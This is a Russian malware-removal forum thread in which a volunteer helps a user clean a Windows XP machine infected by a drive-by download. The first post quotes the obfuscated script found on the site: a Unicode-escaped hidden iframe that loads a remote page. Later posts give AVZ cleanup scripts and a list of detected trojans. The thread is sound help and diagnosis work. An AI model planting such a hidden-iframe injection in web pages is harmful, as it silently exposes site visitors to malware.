Показано с 1 по 8 из 8.

Поймал трояна с сайта (заявка № 23176)

  1. #1
    Junior Member Репутация
    Регистрация
    04.09.2007
    Сообщений
    124
    Вес репутации
    61

    Exclamation Поймал трояна с сайта

    На совершенно мирном сувенирном сайте kaleidoscope поймал за хвост трояна:

    </body>
    </html>

    <script type="text/javascript">
    document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0063\u006f\u 0075\u006e\u0074\u0065\u0072\u006d\u0065\u0064\u00 69\u0061\u0067\u0072\u006f\u0075\u0070\u002e\u0063 \u006f\u006d\u002f\u0074\u0073\u002f\u0069\u006e\u 002e\u0063\u0067\u0069\u003f\u0079\u0061\u0068\u00 6f\u006f\u0022\u0020\u0077\u0069\u0064\u0074\u0068 \u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u 0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u00 65\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069 \u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u 0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u00 74\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f \u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u 0069\u0066\u0072\u0061\u006d\u0065\u003e');
    </script>

    А теперь никак не вычищу.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.03.2008
    Сообщений
    14,832
    Вес репутации
    1808
    Отключите антивирус и интернет!

    Пофиксить

    Код:
    O4 - HKLM\..\Run: [runwinlogon] C:\WINDOWS\winlogon.exe
    O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
    O4 - HKLM\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
    O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spools.exe
    O4 - HKCU\..\Run: [autoload] C:\Documents and Settings\Ekimenkov\cftmon.exe
    O4 - HKUS\S-1-5-18\..\Run: [herjek] C:\WINDOWS\herjek.exe (User 'SYSTEM')
    O16 - DPF: {BD11A280-2E73-11CF-B6CF-00AA00A74DAE} - file://C:\Info_sex4.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
    O17 - HKLM\System\CCS\Services\Tcpip\..\{5F9689F3-E406-4B7B-AAF1-FC4D14AF8982}: NameServer = 85.255.115.60,85.255.112.106
    O17 - HKLM\System\CCS\Services\Tcpip\..\{62D3B7E4-334B-4070-B638-1FBF021DAFAD}: NameServer = 85.255.115.60,85.255.112.106
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
    O17 - HKLM\System\CS2\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
    O17 - HKLM\System\CS3\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
    O17 - HKLM\System\CS3\Services\Tcpip\..\{345FC773-F6EF-49FE-90EC-F107DC0BFF16}: NameServer = 85.255.115.60,85.255.112.106
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 85.255.115.60 85.255.112.106
    AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".

    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     QuarantineFile('kdeed.exe','');
     QuarantineFile('C:\WINDOWS\winlogon.exe','');
     QuarantineFile('C:\WINDOWS\herjek.exe','');
     QuarantineFile('C:\Documents and Settings\LocalService\cftmon.exe','');
     QuarantineFile('C:\Documents and Settings\Ekimenkov\cftmon.exe','');
     QuarantineFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe','');
     QuarantineFile('c:\windows\system32\drivers\spools.exe','');
     TerminateProcessByName('c:\windows\system32\drivers\spools.exe');
     DeleteService('Bgib46');
     DeleteService('Schedule');
     DeleteService('Google Online Services');
     DeleteFile('C:\WINDOWS\system32\kdeed.exe');     
     DeleteFile('c:\windows\system32\drivers\spools.exe');
     DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
     DeleteFile('C:\Documents and Settings\Ekimenkov\cftmon.exe');
     DeleteFile('C:\Documents and Settings\LocalService\cftmon.exe');
     DeleteFile('C:\WINDOWS\herjek.exe');
     DeleteFile('C:\WINDOWS\winlogon.exe');
     DeleteFile('kdeed.exe');
    BC_ImportALL;  
    ExecuteSysClean;
    BC_Activate;
    ExecuteRepair(1 );    
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.
    Прислать карантин согласно приложения 3 правил .
    Загружать по ссылке:http://virusinfo.info/upload_virus.php?tid=23176

    AVZ => Файл => Мастер поиска и устранения проблем. Категория проблемы - поставьте "Системные проблемы", степень опасности - "Все проблемы". Нажмите "Пуск". Всё найденное следует пометить и пофиксить. Данную операцию повторить для категории "Настройки и твики браузера".

    Это лакомый кусочек для зверей:

    Код:
    Platform: Windows XP SP1 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
    Нужно срочно обновить систему,иначе вы у нас надолго.

    Повторите логи.

  4. #3
    Junior Member Репутация
    Регистрация
    04.09.2007
    Сообщений
    124
    Вес репутации
    61
    Да уж, вот это куча...
    Все пофиксил-поскриптил.
    Карантин выслал.
    Логи повторил.

    Но DrWEB всё равно определяет наличие Trojan.MulDrop.15170 и Downloader.60042


    Цитата Сообщение от Гриша Посмотреть сообщение
    Это лакомый кусочек для зверей:

    Код:
    Platform: Windows XP SP1 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
    Нужно срочно обновить систему, иначе вы у нас надолго.
    А до какой степени посоветуете обновить? До SP3?
    Последний раз редактировалось Ивпал; 08.06.2010 в 12:45.

  5. #4
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.03.2008
    Сообщений
    14,832
    Вес репутации
    1808
    Доктора отключить!

    AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".

    Код:
    begin
    ClearQuarantine;    
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     DeleteService('Bgib46');
     DeleteService('Google Online Services');
     DeleteService('Schedule');
     DeleteFile('C:\WINDOWS\system32\drivers\spools.exe');
     DeleteFile('C:\Documents and Settings\Ekimenkov\ie_updates3r.exe');
    BC_ImportDeletedList;
    ExecuteSysClean;
    BC_DeleteSvc('Bgib46 ');
    BC_DeleteSvc('Google Online Services ');
    BC_DeleteSvc('Schedule ');    
    BC_Activate;  
    RebootWindows(true);
    end.
    Обновите базы AVZ и повторите все логи.Обновиться лучше до SP3

  6. #5
    Junior Member Репутация
    Регистрация
    04.09.2007
    Сообщений
    124
    Вес репутации
    61
    Скрипт выполнил.

    При получении логов AVZ выловил еще Trojan-Spy.Webmoner
    Возможно, это связано с тем, что перед этим я по Вашему совету обновил базы AVZ.

    Логи прилагаю.
    Последний раз редактировалось Ивпал; 08.06.2010 в 12:45.

  7. #6
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.03.2008
    Сообщений
    14,832
    Вес репутации
    1808
    Хорошо прижились даже уходить не хотят

    Скачайте,меню,File,появится аналог проводника,найти:

    Код:
    C:\WINDOWS\system32\drivers\spools.exe
    C:\Documents and Settings\Ekimenkov\ie_updates3r.exe
    Правая кнопка мыши Force Delete на запрос о перезагрузке ответьте положительно.

    Затем скрипт из поста №4 http://virusinfo.info/showpost.php?p=229826&postcount=4

  8. #7
    Junior Member Репутация
    Регистрация
    04.09.2007
    Сообщений
    124
    Вес репутации
    61
    Похоже, мы его всё-таки выдавили

    И Айс уже не понадобился (в том смысле, что он уже не нашел следов ie_updates3r.exe). Вероятно, это я пристегнул какие-то старые логи.

    Спасибо!

  9. #8
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 15
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\\documents and settings\\ekimenkov\\cftmon.exe - Trojan-Downloader.Win32.BHO.hh (DrWEB: Trojan.DownLoader.6200
      2. c:\\documents and settings\\ekimenkov\\ie_updates3r.exe - Trojan-Downloader.Win32.Winlagons.jl (DrWEB: Trojan.DownLoader.based)
      3. c:\\documents and settings\\localservice\\cftmon.exe - Trojan-Downloader.Win32.BHO.hh (DrWEB: Trojan.DownLoader.6200
      4. c:\\windows\\herjek.exe - Email-Worm.Win32.Zhelatin.zb (DrWEB: Trojan.Packed.46
      5. c:\\windows\\system32\\drivers\\spools.exe - Trojan-Downloader.Win32.BHO.hh (DrWEB: Trojan.DownLoader.6200
      6. c:\\windows\\system32\\kdeed.exe - Trojan.Win32.Monder.gen (DrWEB: Trojan.Virtumod.based.14)
      7. c:\\windows\\winlogon.exe - Trojan-Proxy.Win32.Small.ou (DrWEB: Trojan.Packed.573)


  • Уважаемый(ая) Ивпал, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Поймал Трояна
      От lsd66 в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 09.12.2010, 23:44
    2. Поймал трояна
      От Domkrat50 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 17.03.2010, 11:27
    3. Поймал трояна.
      От Sibirian в разделе Помогите!
      Ответов: 8
      Последнее сообщение: 12.03.2009, 23:37
    4. Поймал по почте трояна
      От Oleg_34 в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 25.09.2008, 11:30
    5. Поймал трояна (Я так думаю)
      От Slaven в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 25.05.2006, 08:21

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01109 seconds with 19 queries